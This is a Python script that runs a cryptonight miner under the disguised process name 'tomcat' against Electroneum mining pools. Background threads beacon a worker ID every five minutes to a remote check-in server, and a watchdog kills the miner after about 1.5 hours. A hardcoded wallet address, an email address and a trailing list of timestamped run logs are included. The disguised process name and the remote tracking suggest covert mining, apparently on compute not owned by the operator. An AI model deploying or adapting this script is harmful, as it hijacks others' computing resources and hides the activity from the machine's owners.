import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:27:04.567980
#2018-02-17 17:16:04.899942
#2018-02-17 19:03:06.960188
#2018-02-17 20:52:05.651658
#2018-02-17 22:39:05.449170
#2018-02-18 00:23:07.182248
#2018-02-18 02:14:05.080508
#2018-02-18 04:01:01.523791
#2018-02-18 05:49:01.420558
#2018-02-18 07:41:06.340368
#2018-02-18 09:28:05.277776
#2018-02-18 11:14:06.097967
#2018-02-18 13:01:04.880085
#2018-02-18 14:49:05.936043
#2018-02-18 16:37:05.299120
#2018-02-18 18:26:05.161184
#2018-02-18 20:13:05.667055
#2018-02-18 21:59:03.899990
#2018-02-18 23:48:05.149243
#2018-02-19 01:34:04.991879
#2018-02-19 03:22:06.102245
#2018-02-19 05:07:03.366435
#2018-02-19 06:54:07.200400
#2018-02-19 08:42:05.577385
#2018-02-19 10:31:07.978896
#2018-02-19 12:19:04.406192
#2018-02-19 14:07:05.999817
#2018-02-19 15:56:08.723671
#2018-02-19 17:44:08.888732
#2018-02-19 19:31:08.818474
#2018-02-19 21:19:03.520468
#2018-02-19 23:04:07.366797
#2018-02-20 00:49:03.901879
#2018-02-20 02:40:05.364901
#2018-02-20 04:29:05.046981
#2018-02-20 06:12:04.375273
#2018-02-20 07:57:05.241995
#2018-02-20 09:42:04.295742
#2018-02-20 11:26:01.584322
#2018-02-20 13:12:06.588809
#2018-02-20 14:57:05.963666
#2018-02-20 16:43:04.692939
#2018-02-20 18:29:07.397209
#2018-02-20 20:21:01.328415
#2018-02-20 22:06:05.270436
#2018-02-20 23:48:06.821442
#2018-02-21 01:35:07.310513
#2018-02-21 03:23:02.159644
#2018-02-21 05:10:07.777137
#2018-02-21 06:58:03.631765
#2018-02-21 08:44:17.079759
#2018-02-21 10:32:05.902647
#2018-02-21 12:21:01.621844
#2018-02-21 14:08:05.562525
#2018-02-21 15:54:01.771270
#2018-02-21 17:46:09.231512
#2018-02-21 19:33:07.052389
#2018-02-21 21:20:04.695031
#2018-02-21 23:06:01.688745
#2018-02-22 00:53:07.798486
#2018-02-22 02:41:02.118913
#2018-02-22 04:27:05.355895
#2018-02-22 06:12:07.369698
#2018-02-22 07:58:07.388383
#2018-02-22 09:47:06.422546
#2018-02-22 11:31:09.547695
#2018-02-22 13:19:05.652770
#2018-02-22 15:08:01.408757
#2018-02-22 16:51:12.030977
#2018-02-22 18:39:01.262388
#2018-02-22 20:29:05.970025
#2018-02-22 22:14:05.756131
#2018-02-23 00:00:11.893610
#2018-02-23 01:48:07.710936
#2018-02-23 03:38:07.493147
#2018-02-23 05:23:06.534355
#2018-02-23 07:10:06.612002
#2018-02-23 09:14:07.323323
#2018-02-23 11:21:12.985820
#2018-02-23 13:11:06.350124
#2018-02-23 14:57:08.379431
#2018-02-23 16:47:04.263939
#2018-02-23 18:34:04.966258
#2018-02-23 20:22:05.981348
#2018-02-23 22:09:06.966800
#2018-02-23 23:55:08.689442
#2018-02-24 01:45:10.057967
#2018-02-24 03:38:06.224143
#2018-02-24 05:22:03.729911
#2018-02-24 07:10:03.904011
#2018-02-24 08:57:03.232449
#2018-02-24 10:57:01.315471
#2018-02-24 12:43:04.867031
#2018-02-24 14:32:07.488830
#2018-02-24 16:19:03.817690
#2018-02-24 18:13:03.820985
#2018-02-24 19:59:05.131635
#2018-02-24 21:43:07.673286
#2018-02-25 00:39:06.974903
#2018-02-25 04:13:05.874109
#2018-02-25 07:44:05.320610